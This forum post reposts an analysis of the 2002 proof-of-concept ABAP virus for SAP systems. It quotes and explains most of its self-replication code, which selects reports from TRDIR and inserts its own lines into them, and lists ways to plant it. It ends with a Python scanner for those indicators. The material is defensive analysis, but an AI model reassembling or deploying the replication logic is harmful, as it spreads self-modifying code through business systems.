Age: 165 Joined: 04 Oct 2007 Posts: 1218 Location: Санкт-Петербург
Posted: Thu May 14, 2009 11:32 am Post subject: SAP Virus
SAP virus
Author: Tuncay Karaca
It has been quite a long time now since the first SAP virus appeared in the year 2002. It was the first and most likely the most famous one till now; the very last virus for an enterprise application environment, SAP. It seems to have been written earlier, in 2000, as a proof-of-concept virus. The concept being proved is that a business application platform such as SAP is not resistant to viruses. The virus, also known as SAP.VSoft.A, SAP.Willi.A or ABAP/Rivpas, was probably coded by some Spanish-speaking guy, as can be observed in its code. It is written in ABAP and its purpose is to spread itself without its activity being monitored. Of course the virus will not replicate in its current form: it needs to be installed manually in the SAP system the first time and is therefore a kind of intended virus. To set up such a virus there must always be somebody with a user's authorization for accessing developer transactions like SE38/SE80. For a detailed analysis of this virus see here.
SAP AG published a consulting SAP note, 512595, related to this virus, describing its behavior and how to prevent it.
Until this "first occurrence" of an SAP virus, no other viruses for the SAP business application platform had been reported. SAP AG pays a lot of attention to securing its products; e.g. refer to its security guide, the security portal on OSS, and the security notes in the OSS components BC-SEC or BC-SEC-VIR, etc. Within the NetWeaver platform there is a broad focus on security aspects. A brand new Virus Scan Interface (VSI) is available for integrating external virus scanner programs into the SAP system, for scanning files or documents that are processed by SAP applications for viruses. In the case of the ABAP Application Server stack, check the following transactions: VSCAN, VSCANGROUP, VSCANPROFILE, VSCANTEST, VSCANTRACE. For an overview of SAP's data security products check out note 786179.
SAP virus, an analysis
Newsbytes has a report published in April 2002. You'll find my preliminary analysis here:
This is a preliminary analysis, but I think I got the big picture. The report might work as expected, but SAP programs contain some very weird constructs, so it may fail in the long run. I consider the infection module "proof-of-concept".
> REPORT VIRIISOFT. "(C) ViriiWare 2000
> * First virus for SAP, report version, in 24 lines of code
> * Effects: only replicates in reports and functions.
> * The line must be uncommented for it to work correctly.
SAP's report directory (potential targets):
> TABLES TRDIR.
Arrays holding program copies in memory (the names may clash with names in the program and generate syntax errors in infected programs). I would choose some other name with fewer chances of a clash.
> SELECT NAME INTO SY-TNAME FROM TRDIR WHERE UNAM NE 'Virii' AND
> ( SUBC = '1' OR ( SUBC = 'I' AND NAME LIKE 'L____U__' ) ).
A target has not been changed by user "Virii" and has report type '1' (online report) or 'I' (include report; the naming convention 'L____U__' looks for generated reports for function modules).
The report uses some "SY-" fields. These are predefined and automatically declared, so the report can be as unobtrusive as possible. Caveat: some SY- fields vanish in newer releases.
Delete all lines outside the "SAPVirii" markers from the memory copy of the running program. All that remains is the virus code.
> LOOP AT VOUT INTO SY-ENTRY.
> IF SY-PAGNO = 3. SY-PAGNO = 0. ENDIF.
> SEARCH SY-ENTRY FOR 'SAPVirii'.
> IF SY-SUBRC = 0. SY-PAGNO = SY-PAGNO + 1. ENDIF.
> CHECK SY-PAGNO = 0. DELETE VOUT.
> ENDLOOP.
Now we insert the virus code into the memory copy of the target program at the remembered place.
> INSERT LINES OF VOUT FROM 1 INTO VIN INDEX SY-WILLI.
If the comment character (*) is removed, the modified target report is inserted into the SAP database:
> *insert report sy-tname from vin. CLEAR SY. "<---Virii Activo
The next start of that report will infect another target. No need to compile, since SAP will do that for you.
I'm currently investigating whether or not the ABAP keyword INSERT REPORT will work in a productive system where report changes are not allowed. As of now, SAP's documentation said nothing about that, so I need to try it out.
Placeholder for malicious(?) actions...
> *The virus's destruction code or effects go here. "SAPVirii
The "SAPVirii comment at the end of this line marks the end of the virus code.
Nice. What do you need to implement it into SAP R/3?
A developer changes a report (you need the SAP rights to do that, and the system must allow changing of SAP reports). This should only be possible in development systems, not in production systems.
A developer creates the report in the development system and transports it into production. SAP logs these events.
A malicious user gets access to the SAP database and imports a modified report into the target system. Possible if the customer did not protect the SAP database port with a firewall. At least for Oracle there is a Cut&Paste instruction available on my homepage.
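As an added example (not code from the original post, nor from the analysed sample), the indicators the analysis above lists (access to the report directory TRDIR, an INSERT REPORT statement whether active or still commented out, and the "SAPVirii" delimiter) can be turned into a static scan over custom ABAP source, with a second check over TRDIR-style rows for programs last changed by an account outside an approved developer list (the same UNAM field the sample itself filters on). The indicator weights, the threshold, the two sample programs and the TRDIR rows are constructed for this example.

```python
"""Static indicator scan for self-modifying ABAP reports.

Added example, not code from the original post or the analysed sample.
Flags ABAP source that touches TRDIR, rewrites a program with
INSERT REPORT (active or commented out) or carries the 'SAPVirii'
delimiter, and audits constructed TRDIR-style rows for programs last
changed by an unapproved user. Weights and fixtures are assumptions.
"""
import re
from dataclasses import dataclass, field

# Indicator patterns taken from the analysis; the weights are this example's own choice.
PATTERNS = {
    "reads_trdir": re.compile(r"\bTRDIR\b", re.I),
    "insert_report": re.compile(r"\bINSERT\s+REPORT\b", re.I),
}
WEIGHTS = {"reads_trdir": 2, "insert_report": 4, "virii_marker": 3}
MARKER = "SAPVirii"


@dataclass
class Finding:
    program: str
    hits: list = field(default_factory=list)  # (line_no, tag)
    score: int = 0


def split_abap_line(line: str):
    """Return (code, comment) for one ABAP source line.

    A '*' in column 1 makes the whole line a comment; otherwise everything
    after the first '"' that is not inside a single-quoted literal is a
    trailing comment.
    """
    if line.startswith("*"):
        return "", line[1:]
    in_literal = False
    for i, ch in enumerate(line):
        if ch == "'":
            in_literal = not in_literal
        elif ch == '"' and not in_literal:
            return line[:i], line[i + 1:]
    return line, ""


def scan_source(program: str, src: str) -> Finding:
    """Scan one program's source and return its indicator hits and score."""
    finding = Finding(program)
    for no, raw in enumerate(src.splitlines(), 1):
        code, comment = split_abap_line(raw)
        for tag, pat in PATTERNS.items():
            if pat.search(code):
                finding.hits.append((no, tag))
            elif pat.search(comment):
                # Statement present but commented out: a dormant payload,
                # exactly the state of the INSERT REPORT line in the sample.
                finding.hits.append((no, tag + "_dormant"))
        if MARKER in code or MARKER in comment:
            finding.hits.append((no, "virii_marker"))
    # Each distinct indicator counts once; a dormant statement scores one less.
    for tag in {t for _, t in finding.hits}:
        dormant = tag.endswith("_dormant")
        base = tag[:-len("_dormant")] if dormant else tag
        finding.score += WEIGHTS[base] - (1 if dormant else 0)
    return finding


def is_suspicious(finding: Finding, threshold: int = 5) -> bool:
    return finding.score >= threshold


def unexpected_authors(trdir_rows, approved_users):
    """Report-directory audit: executable ('1') or include ('I') programs
    whose last changer (UNAM) is not an approved developer account."""
    return sorted(r["NAME"] for r in trdir_rows
                  if r["SUBC"] in ("1", "I") and r["UNAM"] not in approved_users)


# Constructed fixtures: a report carrying the indicators and a benign one.
SAMPLE_INFECTED = """REPORT ZDEMO_INFECTED.
TABLES TRDIR.
SELECT NAME INTO SY-TNAME FROM TRDIR WHERE UNAM NE 'Virii'.
*insert report sy-tname from vin. "<---still commented out
*Payload placeholder. "SAPVirii
"""
SAMPLE_CLEAN = """REPORT ZDEMO_CLEAN.
WRITE: 'hello'. " prints a greeting
"""
TRDIR_ROWS = [  # constructed rows mimicking the TRDIR columns NAME / UNAM / SUBC
    {"NAME": "ZDEMO_CLEAN", "UNAM": "DEV01", "SUBC": "1"},
    {"NAME": "ZDEMO_INFECTED", "UNAM": "Virii", "SUBC": "1"},
    {"NAME": "LZDEMU01", "UNAM": "DEV01", "SUBC": "I"},
    {"NAME": "ZDEMO_MODPOOL", "UNAM": "SAP", "SUBC": "M"},
]
APPROVED = {"DEV01", "SAP"}

if __name__ == "__main__":
    for name, src in (("ZDEMO_INFECTED", SAMPLE_INFECTED), ("ZDEMO_CLEAN", SAMPLE_CLEAN)):
        f = scan_source(name, src)
        print(name, f.score, "SUSPICIOUS" if is_suspicious(f) else "ok", f.hits)
    print("changed by unapproved user:", unexpected_authors(TRDIR_ROWS, APPROVED))
```

The comment splitter is deliberately aware of commented-out statements: the sample ships with its INSERT REPORT disabled by a leading "*", and a scan that only looked at active code would rate it clean until someone removes that character. In practice the source would be pulled from the development system's program store and the TRDIR rows from the table itself; the same author check also serves to review what was transported into production.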